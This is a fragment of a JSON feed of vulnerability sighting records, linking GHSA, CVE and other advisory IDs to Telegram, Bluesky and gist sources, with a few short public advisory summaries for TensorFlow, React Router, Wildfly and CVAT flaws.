"1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C32M-27PJ-4XCJ", "type": "published-proof-of-concept", "source": "Telegram/BdAJvjHyhFMVsKfZl02ptmuMNqjhviASPolesySVDo2DxO4", "content": "", "creation_timestamp": "2025-06-13T18:01:53.000000Z"}, {"uuid": "7469089f-a82d-4119-a07a-a7a136bb9807", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-83GH-P93G-CWGX", "type": "seen", "source": "Telegram/KLejpjD5UEH6hnx5d7FQ9Ch0fmQr9r8Zh3VRBo7F-IhlZCI", "content": "", "creation_timestamp": "2025-06-16T21:31:33.000000Z"}, {"uuid": "9d83e40b-dc09-4c40-aee6-884b8b0ba597", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JM43-HRQ7-R7W6", "type": "published-proof-of-concept", "source": "Telegram/LbSE4ui0deWaIbAIy_SI6HyoY8sH4t9aZhKhv-gkpgMW3iE", "content": "", "creation_timestamp": "2025-06-13T17:05:18.000000Z"}, {"uuid": "00b36d1a-76b4-4d62-b589-0b92b0c4e432", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9875-CW22-F7CX", "type": "published-proof-of-concept", "source": "Telegram/LbSE4ui0deWaIbAIy_SI6HyoY8sH4t9aZhKhv-gkpgMW3iE", "content": "", "creation_timestamp": "2025-06-13T17:05:18.000000Z"}, {"uuid": "8dac87c8-482f-493c-ad8e-b308ef0fded1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GQ7V-JR8C-MFR7", "type": "published-proof-of-concept", "source": "Telegram/ghFeQqn7WsKg2yNt1HKTrHYsC0dY2gPgdqVTKv1dpIc73do", "content": "", "creation_timestamp": "2025-06-19T16:01:02.000000Z"}, {"uuid": "a4135a31-40d3-436b-88a9-c04d201e427f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-F5CX-H789-J959", "type": "published-proof-of-concept", "source": "Telegram/S1Qn3Mgp8Fycfi30xks_bWkIDSfEWmvKzQ9DV8ScyPxkMsw", "content": "", "creation_timestamp": "2025-06-20T00:31:10.000000Z"}, {"uuid": "af9ac10c-d6aa-47f2-9d80-ca838804beea", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-R6JX-9G48-2R5R", "type": "published-proof-of-concept", "source": "https://t.me/cKure/6729", "content": "\u25a0\u25a0\u25a0\u25a0\u25a1 Arbitrary code execution due to YAML deserialization.\n\nhttps://github.com/tensorflow/tensorflow/security/advisories/GHSA-r6jx-9g48-2r5r", "creation_timestamp": "2021-08-23T18:03:31.000000Z"}, {"uuid": "4dad35db-ac60-49d8-8fc1-a3ae3f5258ed", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WPC6-J37R-JCX7", "type": "seen", "source": "Telegram/3f3-cwfXIykKmhboQeDZ-9JfvsVfmMtyX9y0DYWKgM6OqHA", "content": "", "creation_timestamp": "2026-01-02T18:52:46.000000Z"}, {"uuid": "443a9045-1694-4a15-8ca6-9806e5a8626a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6QHV-4H7R-2G9M", "type": "seen", "source": "Telegram/VYISubODK9o2_EhmMQtV1Poo-UEd9SUXrb4Hppof0xM5PUw", "content": "", "creation_timestamp": "2025-06-21T02:03:08.000000Z"}, {"uuid": "7a4ee8d6-db88-4dea-8e61-53d89038cb99", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-34GH-G567-HQ85", "type": "seen", "source": "Telegram/VYISubODK9o2_EhmMQtV1Poo-UEd9SUXrb4Hppof0xM5PUw", "content": "", "creation_timestamp": "2025-06-21T02:03:08.000000Z"}, {"uuid": "c7469099-5791-4ffa-9f58-e28df61723e0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6RJ9-GM78-VHF9", "type": "seen", "source": "Telegram/4r04zWJgrmQv0yEVmAWjrKvQZP1gSq3jFlo4VyC10oe-FCw", "content": "", "creation_timestamp": "2025-06-18T05:31:44.000000Z"}, {"uuid": "deb38199-72dd-4d1c-84ff-8e70de2a9a57", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-89QQ-HGVP-X37M", "type": "published-proof-of-concept", "source": "Telegram/nObzSxAwsIeng4VDUccv7dnQem0aV8u55_UUO-PQOeN9FbA", "content": "", "creation_timestamp": "2025-06-19T04:01:04.000000Z"}, {"uuid": "6302ee07-1b3e-403c-9ea7-920e9b8a4692", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XQ5X-WGCM-3P33", "type": "published-proof-of-concept", "source": "Telegram/XaC8rYUUisXuxpQNfRmu_uv9OR5yniGZmuw_aLZ5_JZjEEk", "content": "", "creation_timestamp": "2025-06-18T23:00:49.000000Z"}, {"uuid": "39d1ebc8-7ab8-441a-98f9-fa58003b4fab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-F46R-RW29-R322", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/13367", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-43864\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: React Router is a router for React. Starting in version 7.2.0 and prior to version 7.5.2, it is possible to force an application to switch to SPA mode by adding a header to the request. If the application uses SSR and is forced to switch to SPA, this causes an error that completely corrupts the page. If a cache system is in place, this allows the response containing the error to be cached, resulting in a cache poisoning that strongly impacts the availability of the application. This issue has been patched in version 7.5.2.\n\ud83d\udccf Published: 2025-04-25T00:18:16.058Z\n\ud83d\udccf Modified: 2025-04-25T00:18:16.058Z\n\ud83d\udd17 References:\n1. https://github.com/remix-run/react-router/security/advisories/GHSA-f46r-rw29-r322\n2. https://github.com/remix-run/react-router/commit/c84302972a152d851cf5dd859ff332b354b70111\n3. https://github.com/remix-run/react-router/blob/e6c53a0130559b4a9bd47f9cf76ea5b08a69868a/packages/react-router/lib/server-runtime/server.ts#L407", "creation_timestamp": "2025-04-25T01:10:56.000000Z"}, {"uuid": "09e62ded-b312-4b00-93a0-ec8cc3d1fd32", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8JHW-6PJJ-8723", "type": "seen", "source": "Telegram/Ju4ikepgZXIrBR48ybMuwvZYHxZpoWOINOTmshCuddu4Jw3q", "content": "", "creation_timestamp": "2025-03-02T11:45:37.000000Z"}, {"uuid": "96b4293c-045f-4f16-9e1f-64485bc1a259", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2025", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/6189", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-10234\n\ud83d\udd25 CVSS Score: 6.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N)\n\ud83d\udd39 Description: A vulnerability was found in Wildfly, where a user may perform Cross-site scripting in the Wildfly deployment system. This flaw allows an attacker or insider to execute a deployment with a malicious payload, which could trigger undesired behavior against the server.\n\ud83d\udccf Published: 2024-10-22T13:17:57.891Z\n\ud83d\udccf Modified: 2025-03-03T11:07:27.735Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2025\n2. https://access.redhat.com/errata/RHSA-2025:2026\n3. https://access.redhat.com/security/cve/CVE-2024-10234\n4. https://bugzilla.redhat.com/show_bug.cgi?id=2320848", "creation_timestamp": "2025-03-03T11:30:18.000000Z"}, {"uuid": "7441c39c-307c-45e2-91ff-16bb430e5f93", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xq3m-2v4x-88gg", "type": "confirmed", "source": "https://www.endorlabs.com/learn/the-dangers-of-reusing-protobuf-definitions-critical-code-execution-in-protobuf-js-ghsa-xq3m-2v4x-88gg", "content": "", "creation_timestamp": "2026-04-17T04:00:00.000000Z"}, {"uuid": "c6540136-c6b6-4a67-b873-d9fc5fe9b2aa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xq3m-2v4x-88gg", "type": "published-proof-of-concept", "source": "https://github.com/protobufjs/protobuf.js/security/advisories/GHSA-xq3m-2v4x-88gg", "content": "", "creation_timestamp": "2026-04-17T04:00:00.000000Z"}, {"uuid": "bfda8885-c5d2-4683-84f6-71979632068b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FRPR-5W6Q-HH4F", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/19471", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-49135\n\ud83d\udd25 CVSS Score: 5.3 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: CVAT is an open source interactive video and image annotation tool for computer vision. Versions 2.2.0 through 2.39.0 have no validation during the import process of a project or task backup to check that the filename specified in the query parameter refers to a TUS-uploaded file belonging to the same user. As a result, if an attacker with a CVAT account and a `user` role knows the filenames of other users' uploads, they could potentially access and steal data by creating projects or tasks using those files.  This issue does not affect annotation or dataset TUS uploads, since in this case object-specific temporary directories are used. Users should upgrade to CVAT 2.40.0 or a later version to receive a patch. No known workarounds are available.\n\ud83d\udccf Published: 2025-06-25T15:05:41.938Z\n\ud83d\udccf Modified: 2025-06-25T15:05:41.938Z\n\ud83d\udd17 References:\n1. https://github.com/cvat-ai/cvat/security/advisories/GHSA-frpr-5w6q-hh4f\n2. https://github.com/cvat-ai/cvat/commit/dbafd9c0287489bea00e1db626f64b107f90bfc9", "creation_timestamp": "2025-06-25T15:52:17.000000Z"}, {"uuid": "808c2bab-f2ca-454d-9a49-3393c1c55329", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-xf68-8hjw-7mpm", "type": "seen", "source": "https://gist.github.com/alon710/77f29ca3c69eb8ef713507cb5ca27a63", "content": "", "creation_timestamp": "2026-02-27T06:40:19.000000Z"}, {"uuid": "e9f0d3c4-2c53-489e-bf91-a3177fa1e55c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7r86-cg39-jmmj", "type": "seen", "source": "https://gist.github.com/alon710/2bf496e3a1a30c1cc70a5381232edca5", "content": "", "creation_timestamp": "2026-02-27T07:10:19.000000Z"}, {"uuid": "7d2ff01b-7399-4ebf-8d1d-d229b98608e3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-23c5-xmqv-rm74", "type": "seen", "source": "https://gist.github.com/alon710/ea527c9b405937e62bf2c5ad28e25c6a", "content": "", "creation_timestamp": "2026-02-27T07:40:18.000000Z"}, {"uuid": "bb2db6d5-e209-4287-beda-494cc3e33250", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5vjq-5jmg-39xq", "type": "seen", "source": "https://bsky.app/profile/andrewnez.mastodon.social.ap.brid.gy/post/3mjmnsikjzws2", "content": "", "creation_timestamp": "2026-04-16T14:49:49.810028Z"}, {"uuid": "162b99d1-b71e-4eca-bbf1-cdbbf01e6c0f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-H829-5CG7-6HFF", "type": "seen", "source": "https://bsky.app/profile/2rZiKKbOU3nTafniR2qMMSE0gwZ.activitypub.awakari.com.ap.brid.gy/post/3mkbqxhjzmlu2", "content": "", "creation_timestamp": "2026-04-25T00:12:21.666764Z"}, {"uuid": "79224c19-4480-4654-88ae-d35d100c3cd7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-8M29-FPQ5-89JJ", "type": "seen", "source": "https://bsky.app/profile/2rZiKKbOU3nTafniR2qMMSE0gwZ.activitypub.awakari.com.ap.brid.gy/post/3mjqjn7dvefi2", "content": "", "creation_timestamp": "2026-04-18T03:45:47.580120Z"}, {"uuid": "06074f88-4a91-4e2c-b543-3a0e8bfc5d5c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-jcc6-f9v6-f7jw", "type": "seen", "source": "https://bsky.app/profile/cyberhub.blog/post/3mjqmj4tzgn2v", "content": "", "creation_timestamp": "2026-04-18T04:37:07.783100Z"}, {"uuid": "b1dd09e7-ad9f-4e64-983a-9aa2e7bc99c2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-xqw8-4j56-5hj6", "type": "seen", "source": "https://bsky.app/profile/cstromblad.com/post/3mhsxtmwmew22", "content": "", "creation_timestamp": "2026-03-24T16:14:56.846296Z"}, {"uuid": "ad3efd15-3379-4364-a0d8-5e2dd7aabb51", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "ghsa-5vp3-3cg6-2rq3", "type": "seen", "source": "https://bsky.app/profile/flarestart.bsky.social/post/3mhtjicqixf26", "content": "", "creation_timestamp": "2026-03-24T21:30:35.096488Z"}, {"uuid": "10adb92b-d18e-4f61-b526-9fe6fd4ebaa8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w62p-hx95-gf2c", "type": "seen", "source": "https://vulnerability.circl.lu/bundle/289697c2-61dc-410f-8343-aba0be87728d", "content": "", "creation_timestamp": "2025-09-10T13:18:37.562245Z"}, {"uuid": "0e0bad30-6088-47cd-ac89-5a0e94a5d3ab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vr88-2hv2-5jvf", "type": "seen", "source": "https://vulnerability.circl.lu/bundle/fdda4963-0aa7-4d15-8a8f-969db8f304ca", "content": "", "creation_timestamp": "2025-02-28T23:49:13.272798Z"}, {"uuid": "71d8638e-cdc2-44c4-b7f4-e537fbbd31b1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2024-ALE-013", "type": "seen", "source": "https://vulnerability.circl.lu/bundle/11268897-8798-4ec2-bcac-b23fe0715823", "content": "", "creation_timestamp": "2025-03-11T20:37:58.600981Z"}, {"uuid": "95d4ca05-5328-413e-bb28-1fd88379c19d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2021-ALE-022", "type": "seen", "source": "https://vulnerability.circl.lu/bundle/11268897-8798-4ec2-bcac-b23fe0715823", "content": "", "creation_timestamp": "2025-03-11T20:37:58.600981Z"}, {"uuid": "b61814d5-7425-4669-bafd-8e5734975879", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2024-ALE-001", "type": "seen", "source": "https://vulnerability.circl.lu/bundle/11268897-8798-4ec2-bcac-b23fe0715823", "content": "", "creation_timestamp": "2025-03-11T20:37:58.600981Z"}, {"uuid": "54afb5c3-a3f8-4eee-a343-5f75e9853224", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9qr9-h5gf-34mp", "type": "seen", "source": "https://vulnerability.circl.lu/bundle/6739b288-995a-4f1a-9f03-5d1ced3a8fbd", "content": "", "creation_timestamp": "2025-12-05T13:54:28.321487Z"}, {"uuid": "80b22b6f-c08f-413f-8118-5d77a1ec02e9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-fv66-9v8q-g76r", "type": "seen", "source": "https://vulnerability.circl.lu/bundle/6739b288-995a-4f1a-9f03-5d1ced3a8fbd", "content": "", "creation_timestamp": "2025-12-05T13:54:28.321487Z"}, {"uuid": "9e0b8c00-435a-4a5e-b94f-ffd3f6ca4638", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-GHC5-95C2-VWCV", "type": "seen", "source": "https://bsky.app/profile/2rZiKKbOU3nTafniR2qMMSE0gwZ.activitypub.awakari.com.ap.brid.gy/post/3milzkcnizop2", "content": "", "creation_timestamp": "2026-04-03T15:22:05.471097Z"}, {"uuid": "b273ecad-1fc5-4263-91a4-472b1ef9bc54", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-pxg6-pf52-xh8x", "type": "seen", "source": "https://gist.github.com/kbellioum/2aaedb76430c4e5fc2f81d1185d752b6", "content": "", "creation_timestamp": "2026-04-03T15:44:39.000000Z"}, {"uuid": "c129f501-eef5-47fd-979d-115ffd7f4eef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-qj8w-gfj5-8c6v", "type": "seen", "source": "https://gist.github.com/kbellioum/2aaedb76430c4e5fc2f81d1185d752b6", "content": "", "creation_timestamp": "2026-04-03T15:44:39.000000Z"}, {"uuid": "2fc8f38f-5610-41ec-87c2-5f123053b7b2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5c6j-r48x-rmvq", "type": "seen", "source": "https://gist.github.com/kbellioum/2aaedb76430c4e5fc2f81d1185d752b6", "content": "", "creation_timestamp": "2026-04-03T15:44:39.000000Z"}, {"uuid": "becb81e6-73f0-4399-b80e-ea45873a5a83", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-GHC5-95C2-VWCV", "type": "seen", "source": "https://bsky.app/profile/2rZiKKbOU3nTafniR2qMMSE0gwZ.activitypub.awakari.com.ap.brid.gy/post/3mim6lxyxg7s2", "content": "", "creation_timestamp": "2026-04-03T16:52:24.672572Z"}, {"uuid": "9f72a345-69ad-4531-bf73-b31b7c1034ee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7r9j-r86q-7g45", "type": "seen", "source": "https://bsky.app/profile/cyber-news-fi.bsky.social/post/3min7vlzl2s2s", "content": "", "creation_timestamp": "2026-04-04T02:48:17.040796Z"}, {"uuid": "84f52754-d3e0-4b88-b1a9-f78d67547072", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-9JPJ-G8VV-J5MF", "type": "seen", "source": "https://bsky.app/profile/2rZiKKbOU3nTafniR2qMMSE0gwZ.activitypub.awakari.com.ap.brid.gy/post/3minvmt3eck62", "content": "", "creation_timestamp": "2026-04-04T09:17:09.946165Z"}, {"uuid": "e4f49991-9b1d-4dc0-9473-226a61b4aded", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-prmx-7v35-7q82", "type": "seen", "source": "https://bsky.app/profile/azu.bsky.social/post/3mipgxyxmxn2t", "content": "", "creation_timestamp": "2026-04-05T00:00:13.307569Z"}, {"uuid": "196ca832-c993-4c78-bd06-3163e501ae38", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-jfqg-hf23-qpw2", "type": "seen", "source": "https://bsky.app/profile/cyber-news-fi.bsky.social/post/3mipqejh3p222", "content": "", "creation_timestamp": "2026-04-05T02:48:16.715382Z"}, {"uuid": "37c38e64-45c6-4aee-8624-e454215677c0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-fw8c-xr5c-95f9", "type": "seen", "source": "https://gist.github.com/zezezez/0abebd3b1cc6a249659292751ea8855a", "content": "", "creation_timestamp": "2026-04-05T16:27:52.000000Z"}, {"uuid": "709d1baa-5c50-41cb-82b0-428422421d3e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PQGX-6WG3-GMVR", "type": "published-proof-of-concept", "source": "Telegram/yvEUayxcitdp3BxnZyJKKsx_9SQ4slGt9KJm017IeBxHD9Y", "content": "", "creation_timestamp": "2026-01-02T18:50:43.000000Z"}, {"uuid": "5d866c0a-f617-45b1-afc4-579ea9ee583d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8XW3-V6C2-J84J", "type": "published-proof-of-concept", "source": "Telegram/yvEUayxcitdp3BxnZyJKKsx_9SQ4slGt9KJm017IeBxHD9Y", "content": "", "creation_timestamp": "2026-01-02T18:50:43.000000Z"}, {"uuid": "02c7acc7-6809-4c13-a755-c18940adff81", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9J5G-G4XM-57W7", "type": "published-proof-of-concept", "source": "Telegram/yvEUayxcitdp3BxnZyJKKsx_9SQ4slGt9KJm017IeBxHD9Y", "content": "", "creation_timestamp": "2026-01-02T18:50:43.000000Z"}, {"uuid": "c3575e11-4c43-4e47-b850-01b14231e4f7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VM5P-43QH-7PMQ", "type": "seen", "source": "Telegram/NtgdGeZWqROuFZ2INFVI_F7wbiZX6L2oMH79jCDcZlZLsnY", "content": "", "creation_timestamp": "2026-01-06T17:06:07.000000Z"}, {"uuid": "158c5112-fefe-4a6a-891f-7cb96423dedb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CJ2C-9JX8-J427", "type": "seen", "source": "Telegram/bqaQ-baLcjpx1IWkdGH2aMiG0fNMlaPjyraV9dUhVjnJnO4", "content": "", "creation_timestamp": "2026-01-06T17:06:30.000000Z"}, {"uuid": "16103fc0-78c2-4806-97be-bea5ffce7d8b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-Q7RG-2J7P-83GP", "type": "seen", "source": "Telegram/bqaQ-baLcjpx1IWkdGH2aMiG0fNMlaPjyraV9dUhVjnJnO4", "content": "", "creation_timestamp": "2026-01-06T17:06:30.000000Z"}, {"uuid": "17762ea6-59b3-47b4-aad9-784ea45225cf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-Q33H-22XM-4CGH", "type": "seen", "source": "Telegram/bqaQ-baLcjpx1IWkdGH2aMiG0fNMlaPjyraV9dUhVjnJnO4", "content": "", "creation_timestamp": "2026-01-06T17:06:30.000000Z"}, {"uuid": "fb3e2fa6-603e-4a3b-95a3-0a8e07bbe3b0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-24MP-FC9Q-C884", "type": "seen", "source": "Telegram/bqaQ-baLcjpx1IWkdGH2aMiG0fNMlaPjyraV9dUhVjnJnO4", "content": "", "creation_timestamp": "2026-01-06T17:06:30.000000Z"}, {"uuid": "8ce825ab-e94d-43d7-960c-237e2b32e026", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5HPF-P8FW-J349", "type": "published-proof-of-concept", "source": "Telegram/yZSA-gL5srwwXIlm3mhY7XRBgiFO_SKTty4HxXbcDy-lV_A", "content": "", "creation_timestamp": "2026-01-07T16:03:56.000000Z"}, {"uuid": "d2073cff-4cab-4655-bced-d6d2d0d4973b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HJXV-XR7W-84FC", "type": "seen", "source": "Telegram/W9cnrPaYEkduQXNMx_Tamq0Dafu5VRSzGfTVZkSYwQLJrcs", "content": "", "creation_timestamp": "2026-01-06T20:13:41.000000Z"}, {"uuid": "63d4e932-d2a5-4e00-9740-fb0baafe0662", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9Q9C-699Q-XR2Q", "type": "seen", "source": "Telegram/W9cnrPaYEkduQXNMx_Tamq0Dafu5VRSzGfTVZkSYwQLJrcs", "content": "", "creation_timestamp": "2026-01-06T20:13:41.000000Z"}, {"uuid": "d929c069-56f2-4c44-a958-bb063ff6a006", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4PV4-4X2X-6J88", "type": "seen", "source": "Telegram/W9cnrPaYEkduQXNMx_Tamq0Dafu5VRSzGfTVZkSYwQLJrcs", "content": "", "creation_timestamp": "2026-01-06T20:13:41.000000Z"}, {"uuid": "5e827e89-9219-4a0c-82b1-4f5a97f3dbe7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HM5P-X4RQ-38W4", "type": "published-proof-of-concept", "source": "Telegram/shQsG5TFmMrzus3uWOqA-vjUO4oHdrJHZ6Xu7ifps-_tm5s", "content": "", "creation_timestamp": "2026-01-07T20:04:13.000000Z"}, {"uuid": "6bfd5335-24ac-41e1-a3fb-bbe47f0fec34", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9CG9-4H4F-J6FG", "type": "seen", "source": "Telegram/p7-fVH_W9dkG9EPidfMpMMammyZ3o7pOvJOe0IQfzq-RKmM", "content": "", "creation_timestamp": "2026-01-07T16:04:17.000000Z"}, 